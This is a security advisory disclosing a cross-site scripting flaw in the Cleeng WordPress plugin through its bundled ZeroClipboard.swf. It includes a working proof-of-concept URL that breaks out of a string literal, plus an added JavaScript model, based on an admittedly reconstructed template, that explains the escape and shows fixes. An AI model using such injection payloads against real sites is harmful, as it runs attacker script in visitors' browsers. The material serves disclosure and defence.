Wordpress Plugins - Cleeng Content Monetization(Cleeng) <== XSS


##################################################
# Description : Wordpress Plugins - Cleeng Content Monetization(Cleeng) <== XSS
# Version : 2.3.2
# Date : 7/8/2013
# Author : Ryuzaki Lawlet / Fahmi Fisal @Justryuz (ryuzaki_l@y7mail.com)
##################################################

About:
Cleeng is a monetization solution that aims to satisfy the interests of both publishers and users:
1- If you are a musician, blogger, teacher, photographer or software developer, this free plug-in is made for you!

The Cleeng Content Monetization (Cleeng) plugin for WordPress ships a vulnerable copy of ZeroClipboard
(wp-content/plugins/cleeng/js/ZeroClipboard.swf), which can be exploited by malicious people to conduct
cross-site scripting attacks against users of any site with the plugin installed.
The vulnerabilities are those already published for ZeroClipboard itself
(http://seclists.org/fulldisclosure/2013/Feb/103) and for the multiple web applications that bundle it;
the plugin inherits them through the bundled SWF.

Affected products:
All versions that bundle ZeroClipboard.swf (tested against 2.3.2)

Affected vendors:
Cleeng Content Monetization
http://cleeng.com / http://wordpress.org/plugins/cleeng/

Details:
Cross-Site Scripting (WASC-08):
XSS via the id parameter of ZeroClipboard.swf (the flashvar is placed unescaped into the JavaScript the SWF
runs in the embedding page through ExternalInterface, so a crafted value breaks out of the string literal)
and XSS via copying an attacker-supplied payload into the victim's clipboard.

POC:
http://site/wp-content/plugins/cleeng/js/ZeroClipboard.swf?id=\"))}catch(e){}if(!self.a)self.a=!alert(/XSS/)//&width&height
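The following JavaScript is an added example, not code from the advisory, the Cleeng plugin or ZeroClipboard. It models why the PoC above works: the SWF hands the id flashvar to ExternalInterface.call(), which serialises the call as a JavaScript statement of the form try { __flash__toXML(ZeroClipboard.dispatch("<id>","load",null)) ; } catch (e) { "<undefined/>"; } and escapes double quotes but not backslashes. The template and the escaping behaviour are my reconstruction of the published Flash behaviour (an assumption, not quoted from the page); the function names, the benign id and the allow-list are mine. The block extracts the id from the PoC URL, scans the generated statement to see whether the id escapes its string literal, and shows two fixes: escaping that also handles backslashes, and an allow-list on the id.

```javascript
// Added example: models the ExternalInterface call that ZeroClipboard.swf emits.
// ASSUMPTION: this is the reconstructed call template, not code from ZeroClipboard.
const ZC_CALL_PREFIX = 'try { __flash__toXML(ZeroClipboard.dispatch("';
const ZC_CALL_SUFFIX = '","load",null)) ; } catch (e) { "<undefined/>"; }';

// PoC URL copied from the advisory above (a single-quoted JS string, so \\" is a literal \").
const POC_URL = 'http://site/wp-content/plugins/cleeng/js/ZeroClipboard.swf' +
  '?id=\\"))}catch(e){}if(!self.a)self.a=!alert(/XSS/)//&width&height';

// ASSUMPTION: Flash escapes " as \" but leaves \ alone, so an input \" becomes \\" (a
// literal backslash followed by an unescaped quote that terminates the string).
function flashEscape(s) {
  return s.replace(/"/g, '\\"');
}

// Fixed escaping: let JSON.stringify escape both backslashes and quotes, then drop
// the surrounding quotes so the value can be embedded in the template's own literal.
function jsStringEscape(s) {
  return JSON.stringify(s).slice(1, -1);
}

// Builds the JavaScript that Flash would execute for a given id and escaper.
function buildExternalInterfaceCall(id, escapeFn = flashEscape) {
  return ZC_CALL_PREFIX + escapeFn(id) + ZC_CALL_SUFFIX;
}

// Returns the index of the closing quote of the string literal opening at js[start],
// honouring backslash escapes; -1 if unterminated.
function scanStringLiteral(js, start) {
  const quote = js[start];
  for (let i = start + 1; i < js.length; i++) {
    if (js[i] === '\\') { i++; continue; }   // skip the escaped character
    if (js[i] === quote) return i;
  }
  return -1;
}

// True when the id terminates the string literal early, i.e. the rest of the id
// is parsed as code rather than as data.
function idEscapes(id, escapeFn = flashEscape) {
  const js = buildExternalInterfaceCall(id, escapeFn);
  const open = ZC_CALL_PREFIX.length - 1;                  // opening quote of the id literal
  const expectedClose = ZC_CALL_PREFIX.length + escapeFn(id).length; // quote that starts the suffix
  return scanStringLiteral(js, open) !== expectedClose;
}

// Pulls the raw id flashvar out of the query string, as the SWF would receive it.
function extractId(url) {
  const query = url.split('?')[1] || '';
  for (const pair of query.split('&')) {
    const eq = pair.indexOf('=');
    const key = eq === -1 ? pair : pair.slice(0, eq);
    if (key === 'id') return decodeURIComponent(eq === -1 ? '' : pair.slice(eq + 1));
  }
  return null;
}

// Allow-list fix: a clipboard element id never needs anything beyond these characters.
const SAFE_ID = /^[A-Za-z0-9_-]+$/;
function safeBuild(id) {
  if (!SAFE_ID.test(id)) throw new Error('rejected ZeroClipboard id: ' + JSON.stringify(id));
  return buildExternalInterfaceCall(id, jsStringEscape);
}

const pocId = extractId(POC_URL);
console.log('benign id escapes literal?        ', idEscapes('clip1'));          // false
console.log('PoC id escapes literal (flash)?   ', idEscapes(pocId));            // true
console.log('PoC id escapes literal (fixed)?   ', idEscapes(pocId, jsStringEscape)); // false
console.log('generated JS for PoC:\n' + buildExternalInterfaceCall(pocId));
```

The scan shows the mechanism exactly as the PoC is built: the leading \" closes the literal, the following )) and } close dispatch(), __flash__toXML() and the try block, catch(e){} satisfies the parser, the alert runs, and // comments out the template's remaining tail. Either fix on its own is sufficient; doing both is the defensive choice, and since the SWF is a prebuilt binary the practical remediation for a site is to update or remove the bundled ZeroClipboard.swf.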

Provided and/or discovered by:
Ryuzaki Lawlet / Fahmi Fisal @justryuz
